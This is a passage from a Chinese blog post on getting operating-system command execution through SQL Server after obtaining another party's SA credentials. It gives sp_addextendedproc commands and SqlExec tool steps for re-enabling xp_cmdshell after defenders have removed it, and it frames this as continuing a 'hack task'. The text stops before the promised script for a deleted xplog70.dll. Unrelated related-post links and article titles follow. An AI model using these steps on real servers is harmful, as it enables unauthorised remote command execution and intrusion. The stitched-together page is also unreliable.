SQL Server SA权限总结
最近需要用到这些东西的时候,发现自己有点记不清了,这真是人老了做什么都不行了。没办法,只好在自己的blog上总结一下吧。使用Sqlexec加管理员的过程这里冰血就不涉及了。
前提需要工具:SQL Query Analyzer和SqlExec Sunx Version
第一部分:
有关去掉xp_cmdshell来保护系统的分析总结:
首先知道一下语句:
1.去掉xp_cmdshell扩展过程的方法是使用如下语句:
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)<br>exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2.添加xp_cmdshell扩展过程的方法是使用如下语句:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
现在看看现象:
我们在取得SA权限后远程用Sqlexec执行cmd命令,出现提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。
现在来看看被去掉xp_cmdshell后恢复的两种方法:
方法一、使用SQL Query Analyzer连接对方后直接写入,挺方便
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
方法二、使用SqlExec Sunx Version
首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
或者对Sql2000情况下使用
sp_addextendedproc 'xp_cmdshell','xplog70.dll'
另外使用SqlExec Sunx Version来去除xp_cmdshell的方法
和加的时候选择条件一样,然后输入
sp_dropextendedproc 'xp_cmdshell'
就可以了
第二部分:
假如对方已经把xplog70.dll删除或者改了名,我们来用下面的方法继续我们的hack任务:
当出现如下现象暗示代表很有可能是xplog70.dll删除或者改了名。
在查询分析器中写入
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
提示
数据库中已存在名为'xp_cmdshell'的对象
那么我们如何恢复呢?
其实按照高手lcx提供的方法,我们可以通过使用查询分析器中写脚本来实现。
SQL Server SA权限总结相关推荐
- SQL Server SA权限总结(还是在冰血blog偷的)
最近需要用到这些东西的时候,发现自己有点记不清了,这真是人老了做什么都不行了.没办法,只好在自己的blog上总结一下吧.使用Sqlexec加管理员的过程这里冰血就不涉及了. 前提需要工具:SQL Qu ...
- Microsoft SQL Server SA权限最新入侵方法
在获得SA密码后,往往因为服务器管理者或"前人"将net.exe和net1.exe被限制使用,无法添加管理员账号.我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来 ...
- 恢复 Microsoft SQL Server SA 密码的三种方法
如果您丢失了 SA 密码,您可能认为唯一的选择是重新安装 SQL Server 并重新附加所有用户数据库.只需在单用户模式下启动 SQL Server,您就可以使用 OSQL 命令轻松恢复 SA 密码 ...
- SQLServer · 最佳实践 · RDS for SQL Server 2012 权限限制的提升与改善
title: SQLServer · 最佳实践 · RDS for SQL Server 2012 权限限制的提升与改善 author: 石沫 背景 SQL Server 作为一种强大的关系型数据库, ...
- SQL Server:OA权限管理设计的实现 下
SQL Server:OA权限管理设计的实现 下 OA系统权限管理设计方案 不同职责的人员,对于系统操作的权限应该是不同的.优秀的业务系统,这是最基本的功能. 可以对"组 ...
- SQL SERVER 2008权限配置
我要的结果是这样:只能有查询表的权限,而且还要有运行SQL Server Profiler的权限.这样才能跟踪发现问题,当然解决问题是另外一回事,即不能有修改和更新存储过程的权限. 我在分配角色成员时 ...
- sql server alter权限_SQL
Transact-SQL语言的5种类型 ·数据定义语言 ·数据操纵语言 ·数据控制语言 ·事务管理语言 ·附加的语言元素 数据定义语言 ·数据定义语言(DDL)是指用来定义和管理数据库以及数据库中各种 ...
- 【解决SQL Server sa连接服务器失败】用户‘sa‘登录失败。已成功与服务器建立连接,但是在登录过程中发生错误
这个问题网上也有写-但是有点杂乱,因为年代久远,很多经验贴格式也很杂乱,图也裂了() 所以我稍微整理了一下网上的步骤,并加以自己的补充 (1)第一次连接服务器,先填写服务器名称(右键我的电脑可以查看到 ...
- Sql Server关于权限、角色以及登录名、用户名的总结
官方文档https://docs.microsoft.com/zh-cn/sql/t-sql/statements/grant-transact-sql?view=sql-server-2017 权限 ...
最新文章
- 演示:标准ACL的配置、及使用技巧、和相关局限
- 批处理清除VisualStudio解决方案文件夹
- hbase源码系列(一)Balancer 负载均衡
- linux FTP服务器访问权限的问题
- 如何在vmware虚拟机下挂载windows硬盘
- 类的特殊成员反射异常处理
- 【渝粤题库】国家开放大学2021春1398分析化学(本)题目
- JavaSE----常用类(String、StringBuilder、StringBuffer)
- 软件测试学习指南(更新中)
- python print 3位小数_python 这样 print 才够骚啊 (3)
- [BZOJ4913][SDOI2017]遗忘的集合
- (转)马云:不要迷信成功学 要多看别人的失败经历
- 做对了什么与留下了什么 小米上市的背后
- 年会弹幕文字_公司办年会有哪些比较创意的形式?
- 欲为苍鹰,勿与鸟鸣, 欲为强者,莫与弱争!
- excel怎么自动填充连续数字
- (附源码)ssm 座位管理系统 毕业设计 250858
- 如何计算每个月有多少天
- Qt播放HTML网页视频
- HTML5期末大作业:商城网站设计——仿天猫在线商城(HTML和CSS实现天猫在线商城网站)
热门文章
- ERNIE,ERNIE2.0,Transformer-XL,XLNET
- 如何把通达信公式变成python_通达信公式-主力雷达Python化
- matlab下载保姆级安装教程,哪个版本比较好些?
- 计算机在剪辑方面的应用,简论计算机多媒体技术在影视后期制作中的应用
- 偶数乘2奇数乘3C语言,输入一个整数x,如果为偶数乘2,否则乘3,然后输出.C语言
- python matplotlib axes3d.get_test_data() 是什么意思?(获得测试数据)
- Cron 表达式详解和案例
- NLP进阶,Bert+BiLSTM情感分析实战
- java全栈系列之JavaSE-面向对象(方法重写)037
- linux 交换机tftp服务,简单文件传输TFTP服务器搭建 Linux RHEL6